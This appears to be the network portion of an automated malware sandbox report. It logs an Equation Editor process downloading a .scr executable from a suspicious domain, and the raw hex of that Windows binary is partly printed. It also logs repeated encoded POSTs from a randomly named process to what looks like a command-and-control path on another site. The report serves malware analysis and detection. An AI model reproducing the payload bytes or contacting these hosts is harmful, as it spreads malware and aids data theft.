ZXdp=NDQ8umMJ3I/+lmhICzVyYgRGc8EEZBWGds7CHqMhrM3QBQpLFYnHKmMZUOI+PAQ6wLqRKT1RBTllz039KauLLtP97FkRqTHIxLzqSKCuxOhD/pIiRnuqMPzmVJBYhlPBvPdZwucfSmvE0p9VhQZp0Hd9THtUo6+OK+FDJzU6J7ZfJR807K/1qSqUobVhD7wqRW4saF07p8yoZ8HhQXm89A5BXHW/JN4s4MDnV5E9uavuUbNGmgBiNjj/F7s6II0QqZjuOldNr2DJkVJDuyaEfSJ1+X1Nmjp4g9pna8JSK3oJZFe/ceuFSVws3BMx2C63lGR/cDpmIF8FG3NH2l7dLhWmzcF1sX5aMBoThvSjbIy88ybkWLzr3r3SU+N8PS/D50w8KwfYWHsITv8KvzUqb732ojGl7SjwmBwhhOjvMd7kWelC85H1TUAHcws4Ln4typA3KBOetQDdJjmHIiEtP/bQa/EjjTV3eq/HZhL2/fkSFw2/t5c0PqhO2gsKCG7aFs8/3kJD3QcMQm1t9e+EZM+GE9vf6AYaO1jlfYocTRms1kuqMl6xKfqFDEE0vQjHNezTpHG+QnVzXNsySW/Geve4uO14aApO+dqcPPIuyPrpKw0vtsKLdme3VsvGDkSZ8bCfM3QN/TmF8HwMGXYoSpopgsNyqpZZu9E8iJMGKCodlvMpCzssCTf8X3tApUOyjen2kUQmYk9g/jQzhUCORjymUlxCIMyeh9Y8YxxFk4n0Q1RhVebrKyThuswD1CtkV1uOd2R1izzQwrO+671QiVJVnxxT8r3ZgtJcuGnRo7JBjAcz44XYA12j3NVao1unLCDwW/QQ3xenyXpPCve/Peo4UsGG5hQPuYzX4//1tewM9/qc6NuwHyDaJU3JZtxX8MwKSg7EnhqIdkRbYUIbASgFhXPK4SLuI+PW8AOW1MG8OudW8L4O88DaB21YgDe7qkRrk5E8anTsK+RPxXA2cACUF2asmd02VZ8xoVFOpy0Z7AK [TRUNCATED]
Jun 3, 2024 08:55:22.417377949 CEST	232	OUT	Data Raw: 6b 2b 6d 74 4a 43 57 73 4e 76 36 34 4c 77 6b 50 7a 69 6b 48 50 6a 37 50 77 66 72 42 4a 41 37 43 44 54 6b 56 61 4c 74 2f 79 39 56 61 61 2b 70 6b 78 4f 2b 56 30 51 4d 54 75 4a 61 7a 52 36 32 4c 71 36 71 70 76 67 69 6a 67 74 78 45 52 55 70 68 6f 6f Data Ascii: k+mtJCWsNv64LwkPzikHPj7PwfrBJA7CDTkVaLt/y9Vaa+pkxO+V0QMTuJazR62Lq6qpvgijgtxERUphoonZ2rYJklHXaA6QQKAvKATO4sSN5hh6ETC0eO7bhAjSCvtkNsdpB6kA/Nyk7DxzpUDsmreAE0DVnm6ymUxuxjztUVhRSUh+zH4lInJRBifrlBBbEnCzre1hwPvyYU/a67TB7e/GvZ2iutBxvtkQbiSL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.22	49209	93.127.187.187	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:55:24.928268909 CEST	743	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 201 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.elenagilherrero.com Origin: http://www.elenagilherrero.com Referer: http://www.elenagilherrero.com/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 4e 44 51 38 75 6d 4d 4a 33 49 2f 2b 6c 6c 4a 49 46 33 35 79 59 41 52 47 66 38 45 45 51 68 57 41 64 73 47 2f 48 72 4a 6b 72 2f 6e 51 43 43 42 4c 46 72 66 48 4a 6d 4d 59 4d 2b 49 36 51 51 51 4b 77 4c 71 6a 4b 53 5a 52 42 54 68 6c 7a 53 7a 39 4d 65 36 49 45 39 50 7a 33 6c 6b 42 71 54 44 72 78 4c 50 36 53 4b 61 75 78 4e 46 44 2b 70 59 69 58 45 47 71 4a 2f 7a 61 54 4a 42 55 68 6c 4c 75 76 4c 78 42 77 75 49 66 54 58 6a 45 30 35 64 56 6d 42 5a 70 39 6e 64 34 65 6e 73 34 67 70 62 79 49 73 51 4a 4f 79 30 5a 49 35 45 37 47 54 73 73 68 4b 47 34 74 58 65 63 6e 2b 55 4d 4f 62 41 36 45 77 3d 3d Data Ascii: ZXdp=NDQ8umMJ3I/+llJIF35yYARGf8EEQhWAdsG/HrJkr/nQCCBLFrfHJmMYM+I6QQQKwLqjKSZRBThlzSz9Me6IE9Pz3lkBqTDrxLP6SKauxNFD+pYiXEGqJ/zaTJBUhlLuvLxBwuIfTXjE05dVmBZp9nd4ens4gpbyIsQJOy0ZI5E7GTsshKG4tXecn+UMObA6Ew==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.22	49210	93.127.187.187	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:55:27.455495119 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 3625 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.elenagilherrero.com Origin: http://www.elenagilherrero.com Referer: http://www.elenagilherrero.com/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 4e 44 51 38 75 6d 4d 4a 33 49 2f 2b 33 55 35 49 57 6d 35 79 4a 67 52 46 54 63 45 45 5a 42 57 45 64 73 36 2f 48 71 4d 68 72 4e 72 51 42 54 52 4c 46 49 6e 48 4c 6d 4d 59 5a 75 49 2b 50 41 51 6c 77 4c 76 61 4b 54 70 42 42 51 4e 6c 7a 31 33 39 4b 62 75 4c 63 64 50 39 7a 6c 6c 58 71 54 44 79 78 4c 2f 41 53 4b 76 4c 78 4e 4e 44 39 62 77 69 63 55 47 70 47 66 7a 61 54 4a 42 54 68 6c 4c 57 76 50 6c 53 77 71 4e 53 53 6b 37 45 30 5a 39 56 31 77 5a 71 78 33 64 38 43 58 74 57 6f 36 44 2b 4b 2b 45 49 4a 7a 41 41 4a 37 46 66 62 54 30 30 37 4a 6e 30 68 69 71 4c 73 62 56 68 4d 62 77 2f 52 57 34 67 61 46 30 37 70 2f 32 6f 5a 73 48 68 51 57 6d 39 35 41 35 42 49 33 57 49 44 74 30 53 34 4d 47 45 56 35 31 66 75 74 33 75 58 59 6c 47 78 41 42 69 4c 54 6a 31 46 37 73 72 47 6f 30 69 71 59 48 51 4f 6c 4d 51 72 32 44 4a 6b 58 42 44 70 6e 47 45 63 43 4a 31 32 33 31 51 73 44 70 35 67 39 64 56 61 38 4e 53 4b 32 67 4a 59 79 79 2f 4c 73 32 4b 48 31 77 76 38 68 4d 2f 67 43 36 6d 6c 47 4e 52 63 44 52 4d 49 45 73 46 47 [TRUNCATED] Data Ascii: ZXdp=NDQ8umMJ3I/+3U5IWm5yJgRFTcEEZBWEds6/HqMhrNrQBTRLFInHLmMYZuI+PAQlwLvaKTpBBQNlz139KbuLcdP9zllXqTDyxL/ASKvLxNND9bwicUGpGfzaTJBThlLWvPlSwqNSSk7E0Z9V1wZqx3d8CXtWo6D+K+EIJzAAJ7FfbT007Jn0hiqLsbVhMbw/RW4gaF07p/2oZsHhQWm95A5BI3WIDt0S4MGEV51fut3uXYlGxABiLTj1F7srGo0iqYHQOlMQr2DJkXBDpnGEcCJ1231QsDp5g9dVa8NSK2gJYyy/Ls2KH1wv8hM/gC6mlGNRcDRMIEsFGyRH6mjdLRWl0cFx9HFGMBg9hveVbKG89n3kB9nopr3UFONmLS/h50lfK0DYWWkISvcKrA8lTr39jDGIuii5mBk5hLG0Mp/kXulC9bf2M0AOQQsuAH4/ypAjKBugtl3dJj2HZRstP/bRd/ElqzYierDbZhHc/dsSFDu/t700CqhO7AsNMm7QFosv3ld13AYMRFdt/cGEbs/gIdvenQYDO1zlfdQMTR+s1FuqNAOxG/q7dUErvQi0Ne/fpHWxQlhzXPEybzDGTPe1sO10JQpH+diqPO0EyOjpKRUvsZ2LcGexJcvGY0S/8fvgM28d/SeF82gMXnYrIZoumsN9g5Zyu8o8iJAGKGsdlckpGDQsAjf+aXtGg0Djje2PkRp9Ympg+yQzmS+JezztG1xyMMz5h9YKYxYYkJH0QHJhX/bsWiSIlMwu4itUV1+od304iC/QwoG+6JNQhlJVnxxM8r3dgtNuuGWGo7JBhUwz4L/YIV2io9UG5lulLCWbW71H3xyng2JPCvewBOo3A8GH5gsouYyG4/71urgM8q+c6vWwVSDaOU3GQNxW8MxRSlScnleIbHZbW2gUfShinXPAyyXhI+KR8BqW07O8P/dW/74Ox8DVZG1BtjSRqgw2k9AsZT3sIPBPzU4xJACVKWaymcI7VZ05oU87p1QZ4gK [TRUNCATED]
Jun 3, 2024 08:55:27.460438967 CEST	1696	OUT	Data Raw: 6b 36 75 74 4a 43 47 73 4e 6f 4f 34 4c 41 6b 41 2f 79 6b 47 47 44 37 49 35 2f 71 61 4a 41 37 34 44 52 67 76 61 4d 39 2f 79 50 64 61 4b 76 70 6b 79 2b 2b 58 79 67 4e 56 6b 70 47 59 52 36 36 78 71 2f 58 4c 76 52 43 6a 79 76 35 45 55 6d 42 68 76 49 Data Ascii: k6utJCGsNoO4LAkA/ykGGD7I5/qaJA74DRgvaM9/yPdaKvpky++XygNVkpGYR66xq/XLvRCjyv5EUmBhvInY7LYOklbvaArzQIoJJy3O4cSN9nd5PzC2ZO7GhAjuCvlgNpsuB78A/OKk4Txy/UDqnreWE0+xnmyMmQVuxjvtV2ZREkh+s34kCHIPcybklB1FTwb1s4Ba9rPrc1auppvQmOjPuZ2Ckc9p+68XSSj5AkhDsu4pI1S

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.22	49211	93.127.187.187	80

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:55:29.982644081 CEST	468	OUT	GET /ufuh/?ZXdp=AB4ctQE666ii/AhBeU9kZh5iWeUIVV2Kc96SebEnk+bcHC5BDpeWN0JKSYAnMmkj4c+BMV0TAiBI+jfmHribLN3e02N+gzPDpozTfLSXwflSzJVcZV+WbefZbN8X&7jsp7=zz9xHbtX HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.elenagilherrero.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jun 3, 2024 08:55:31.626583099 CEST	1236	IN	HTTP/1.1 301 Moved Permanently Server: hcdn Date: Mon, 03 Jun 2024 06:55:31 GMT Content-Type: text/html Content-Length: 795 Connection: close location: https://www.elenagilherrero.com/ufuh/?ZXdp=AB4ctQE666ii/AhBeU9kZh5iWeUIVV2Kc96SebEnk+bcHC5BDpeWN0JKSYAnMmkj4c+BMV0TAiBI+jfmHribLN3e02N+gzPDpozTfLSXwflSzJVcZV+WbefZbN8X&7jsp7=zz9xHbtX platform: hostinger content-security-policy: upgrade-insecure-requests alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 50a5475c054b8a5319adead96857a8eb-nme-edge3 x-hcdn-cache-status: MISS x-hcdn-upstream-rt: 0.655 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:
Jun 3, 2024 08:55:31.626599073 CEST	123	IN	Data Raw: 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 Data Ascii: 20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	188.114.97.3	443	652	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
2024-06-03 06:51:23 UTC	314	OUT	GET /sharon.scr HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: dukeenergyltd.top Connection: Keep-Alive
2024-06-03 06:51:24 UTC	771	IN	HTTP/1.1 200 OK Date: Mon, 03 Jun 2024 06:51:24 GMT Content-Type: application/x-silverlight Content-Length: 825856 Connection: close Last-Modified: Mon, 03 Jun 2024 00:12:05 GMT ETag: "c9a00-619f12eeafb7d" Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7GzGQMfaIKIkqKBnh7dPrftDeonSQJyucDkZe6L0Tuhjl1hjPRaXWguHt7TXtn1X7gE5Wi92wMLVaDSuQ997q8uc%2FKVpoLv5ggN21ZseG3u1yMUJcjhRdfSrMLYxwyl6W8W0%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; includeSubDomains; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 88ddc1214b6e6b22-DFW alt-svc: h3=":443"; ma=86400
2024-06-03 06:51:24 UTC	598	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0a 62 f1 f9 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 8e 0c 00 00 0a 00 00 00 00 00 00 1e ac 0c 00 00 20 00 00 00 c0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 0d 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELb"0 @ `
2024-06-03 06:51:24 UTC	1369	IN	Data Raw: 0a 00 00 2a 22 00 02 80 02 00 00 04 2a 22 02 28 43 00 00 0a 00 2a 56 73 07 00 00 06 28 44 00 00 0a 74 03 00 00 02 80 03 00 00 04 2a 9e 02 14 7d 05 00 00 04 02 28 45 00 00 0a 00 00 7e 34 00 00 04 74 11 00 00 01 28 46 00 00 0a 26 02 28 1a 00 00 06 00 2a 0a 00 2a 2e 28 05 00 00 06 80 04 00 00 04 2a 22 00 73 09 00 00 06 26 2a a2 28 66 00 00 0a 28 23 00 00 06 6f 67 00 00 0a 6f 68 00 00 0a 1f 23 9a 80 34 00 00 04 00 28 69 00 00 0a 80 30 00 00 04 2a 92 02 1f 1f 7d 33 00 00 04 02 28 3e 00 00 0a 00 00 02 02 7b 33 00 00 04 17 58 8d 08 00 00 02 7d 32 00 00 04 2a 7a 02 28 3e 00 00 0a 00 00 02 03 7d 35 00 00 04 02 04 7d 36 00 00 04 02 05 7d 37 00 00 04 2a 1e 02 28 3e 00 00 0a 2a 1a 7e 39 00 00 04 2a 1e 02 80 39 00 00 04 2a 56 28 26 00 00 06 72 cf 03 00 70 7e 39 00 00 Data Ascii: ""(CVs(Dt}(E~4t(F&(*.("s&(f(#ogoh#4(i0}3(>{3X}2z(>}5}6}7(>~99*V(&rp~9
2024-06-03 06:51:24 UTC	1369	IN	Data Raw: d3 10 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 ed 10 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 19 11 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 43 11 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 8b 11 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 cd 11 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 f1 11 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 19 12 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 3b 12 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 67 12 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 83 12 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 ab 12 00 70 7e 39 00 00 04 6f 70 00 00 Data Ascii: p~9opV(&rp~9opV(&rp~9opV(&rCp~9opV(&rp~9opV(&rp~9opV(&rp~9opV(&rp~9opV(&r;p~9opV(&rgp~9opV(&rp~9op*V(&rp~9op
2024-06-03 06:51:24 UTC	1369	IN	Data Raw: 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 9d 1e 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 c5 1e 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 f1 1e 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 0d 1f 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 49 1f 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 87 1f 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 c5 1f 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 1b 20 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 47 20 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 9f 20 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 00 00 06 72 e3 20 00 70 7e 39 00 00 04 6f 70 00 00 0a 2a 56 28 26 Data Ascii: 9opV(&rp~9opV(&rp~9opV(&rp~9opV(&rp~9opV(&rIp~9opV(&rp~9opV(&rp~9opV(&r p~9opV(&rG p~9opV(&r p~9opV(&r p~9opV(&
2024-06-03 06:51:24 UTC	1369	IN	Data Raw: 70 00 00 0a 2a 36 7e 39 00 00 04 02 03 28 da 00 00 06 2a 4a 04 2c 0d 04 8e 2c 09 02 03 04 28 71 00 00 0a 2a 03 2a 76 02 28 72 00 00 0a 02 28 26 00 00 06 03 28 27 00 00 06 6f 70 00 00 0a 28 73 00 00 0a 2a 4e 02 7e 6c 00 00 0a 7d 3a 00 00 04 02 03 28 76 00 00 0a 2a 6a 02 7e 6c 00 00 0a 7d 3a 00 00 04 02 03 28 76 00 00 0a 02 04 7d 3a 00 00 04 2a 76 02 28 77 00 00 0a 02 28 26 00 00 06 03 28 27 00 00 06 6f 70 00 00 0a 28 78 00 00 0a 2a 26 02 03 04 28 79 00 00 0a 2a 2e 72 7c 30 00 70 80 3b 00 00 04 2a 62 02 73 0f 01 00 06 7d 3e 00 00 04 02 28 88 00 00 0a 02 28 0b 01 00 06 2a 3a 02 28 e5 00 00 06 02 03 28 09 01 00 06 2a 92 02 73 0f 01 00 06 7d 3e 00 00 04 02 28 88 00 00 0a 02 28 0b 01 00 06 02 7b 3e 00 00 04 03 6f 11 01 00 06 2a 32 02 7b 3d 00 00 04 6f 89 00 00 Data Ascii: p6~9(J,,(q*v(r(&('op(sN~l}:(vj~l}:(v}:v(w(&('op(x&(y.r\|0p;bs}>((:((s}>(({>o2{=o
2024-06-03 06:51:24 UTC	1369	IN	Data Raw: 28 34 01 00 06 2a 46 02 72 3a 32 00 70 28 ba 00 00 0a a5 2c 01 00 01 2a 4a 02 72 3a 32 00 70 03 8c 2c 01 00 01 28 bb 00 00 0a 2a 46 02 72 54 32 00 70 28 ba 00 00 0a a5 2c 01 00 01 2a 4a 02 72 54 32 00 70 03 8c 2c 01 00 01 28 bb 00 00 0a 2a 46 02 72 7a 32 00 70 28 ba 00 00 0a a5 18 00 00 01 2a 4a 02 72 7a 32 00 70 03 8c 18 00 00 01 28 bb 00 00 0a 2a 46 02 72 a8 32 00 70 28 ba 00 00 0a a5 36 01 00 01 2a 4a 02 72 a8 32 00 70 03 8c 36 01 00 01 28 bb 00 00 0a 2a 46 02 72 cc 32 00 70 28 ba 00 00 0a a5 1a 01 00 01 2a 4a 02 72 cc 32 00 70 03 8c 1a 01 00 01 28 bb 00 00 0a 2a 46 02 72 e8 32 00 70 28 ba 00 00 0a a5 36 01 00 01 2a 4a 02 72 e8 32 00 70 03 8c 36 01 00 01 28 bb 00 00 0a 2a 46 02 72 16 33 00 70 28 ba 00 00 0a 74 12 00 00 01 2a 36 02 72 16 33 00 70 03 28 Data Ascii: (4Fr:2p(,Jr:2p,(FrT2p(,JrT2p,(Frz2p(Jrz2p(Fr2p(6Jr2p6(Fr2p(Jr2p(Fr2p(6Jr2p6(Fr3p(t6r3p(
2024-06-03 06:51:24 UTC	1369	IN	Data Raw: 2a 42 02 03 28 2b 01 00 0a 16 fe 01 28 d3 01 00 06 2a 3e 02 03 28 2c 01 00 0a 02 04 7d 6a 00 00 04 2a 6a 02 2d 10 28 98 00 00 0a 72 68 35 00 70 6f 99 00 00 0a 7a 02 73 e9 01 00 06 2a a2 02 28 2f 01 00 0a 03 2d 10 28 98 00 00 0a 72 44 35 00 70 6f 99 00 00 0a 7a 02 03 7d 6d 00 00 04 02 04 7d 6c 00 00 04 2a 0a 17 2a 32 02 7b 6d 00 00 04 6f 30 01 00 0a 2a a2 28 98 00 00 0a 28 d7 00 00 06 17 8d 01 00 00 01 25 16 72 86 35 00 70 a2 28 d9 00 00 06 73 a2 00 00 0a 6f 31 01 00 0a 7a a2 28 98 00 00 0a 28 d7 00 00 06 17 8d 01 00 00 01 25 16 72 94 35 00 70 a2 28 d9 00 00 06 73 a2 00 00 0a 6f 31 01 00 0a 7a a2 28 98 00 00 0a 28 d8 00 00 06 17 8d 01 00 00 01 25 16 72 94 35 00 70 a2 28 d9 00 00 06 73 a2 00 00 0a 6f 31 01 00 0a 7a a2 28 98 00 00 0a 28 d6 00 00 06 17 8d 01 Data Ascii: B(+(>(,}jj-(rh5pozs(/-(rD5poz}m}l*2{mo0((%r5p(so1z((%r5p(so1z((%r5p(so1z((
2024-06-03 06:51:24 UTC	1369	IN	Data Raw: 8f 00 00 04 03 04 05 6f 90 01 00 0a 2a 3e 02 7b 8f 00 00 04 03 04 05 6f 91 01 00 0a 2a 4e 02 28 32 02 00 06 02 7b 8f 00 00 04 03 6f 92 01 00 0a 2a 4a 02 28 32 02 00 06 02 7b 8f 00 00 04 6f 60 01 00 0a 2a 3e 02 7b 8f 00 00 04 03 04 05 6f 93 01 00 0a 2a 32 02 7b 8f 00 00 04 6f 32 01 00 0a 2a 36 02 7b 8f 00 00 04 03 6f 22 01 00 0a 2a 3a 02 7b 8f 00 00 04 03 04 6f 94 01 00 0a 2a 36 02 7b 8f 00 00 04 03 6f 95 01 00 0a 2a 3e 02 03 7d 8e 00 00 04 02 04 7d 8f 00 00 04 2a 6e 02 28 37 01 00 0a 02 03 04 05 0e 04 0e 05 0e 06 73 3f 02 00 06 7d 92 00 00 04 2a 1e 02 7b 92 00 00 04 2a 32 02 7b 92 00 00 04 6f 38 01 00 0a 2a 1e 02 7b 95 00 00 04 2a 1a 72 46 37 00 70 2a 1e 02 7b 9c 00 00 04 2a fe 03 2d 15 28 98 00 00 0a 72 b2 36 00 70 73 6a 00 00 0a 6f a3 00 00 0a 7a 04 2d Data Ascii: o>{oN(2{oJ(2{o`>{o2{o26{o":{o6{o>}}n(7s?}{2{o8{rF7p{-(r6psjoz-
2024-06-03 06:51:24 UTC	1369	IN	Data Raw: bd 00 00 04 02 04 7d bc 00 00 04 2a 3a 02 7b bc 00 00 04 03 04 6f d4 01 00 0a 2a 3a 02 7b bd 00 00 04 03 04 6f d5 01 00 0a 2a 56 02 28 3e 00 00 0a 02 03 7d bf 00 00 04 02 04 7d be 00 00 04 2a 3a 02 7b bf 00 00 04 03 04 6f d6 01 00 0a 2a 3e 02 7b be 00 00 04 03 04 05 6f d7 01 00 0a 2a 4a 02 72 ed 02 00 70 7d c5 00 00 04 02 28 3e 00 00 0a 2a 7e 03 03 6f 0c 02 00 0a 04 6f 0d 02 00 0a 05 6f 28 01 00 0a 72 39 3b 00 70 03 6f 9e 01 00 0a 2a 56 02 28 3e 00 00 0a 02 03 7d cb 00 00 04 02 04 7d ca 00 00 04 2a 46 28 1b 02 00 0a 02 7b cb 00 00 04 6f 1c 02 00 0a 2a 1e 17 8d 01 00 00 01 2a 1e 02 7b cd 00 00 04 2a 22 02 03 7d cd 00 00 04 2a 42 28 98 00 00 0a 73 24 02 00 0a 6f a3 00 00 0a 7a 8e 02 7b ce 00 00 04 6f 1e 02 00 0a 02 7b cf 00 00 04 6f 1e 02 00 0a 28 2a 03 00 Data Ascii: }:{o:{oV(>}}:{o>{oJrp}(>~ooo(r9;poV(>}}F({o{"}B(s$oz{o{o(
2024-06-03 06:51:24 UTC	1369	IN	Data Raw: 2a fa 02 28 3e 00 00 0a 02 73 45 03 00 0a 7d 40 01 00 04 02 73 46 03 00 0a 7d 44 01 00 04 02 73 47 03 00 0a 7d 42 01 00 04 02 73 f8 02 00 0a 7d 41 01 00 04 02 73 3e 00 00 0a 7d 45 01 00 04 2a 86 02 28 5c 03 00 0a 03 2d 10 28 98 00 00 0a 72 55 3c 00 70 6f 99 00 00 0a 7a 02 03 7d 48 01 00 04 2a 36 02 7b 48 01 00 04 03 6f 5d 03 00 0a 2a 36 02 7b 48 01 00 04 03 6f 5e 03 00 0a 2a 3a 02 7b 48 01 00 04 03 04 6f 5f 03 00 0a 2a 92 28 98 00 00 0a 28 ae 00 00 06 17 8d 01 00 00 01 25 16 02 a2 28 d9 00 00 06 73 0b 01 00 0a 6f a3 00 00 0a 7a 96 02 7b 4b 01 00 04 2d 16 02 02 7b 4a 01 00 04 6f 68 03 00 0a 28 4f 03 00 06 7d 4b 01 00 04 02 7b 4b 01 00 04 2a 92 28 98 00 00 0a 28 af 00 00 06 17 8d 01 00 00 01 25 16 02 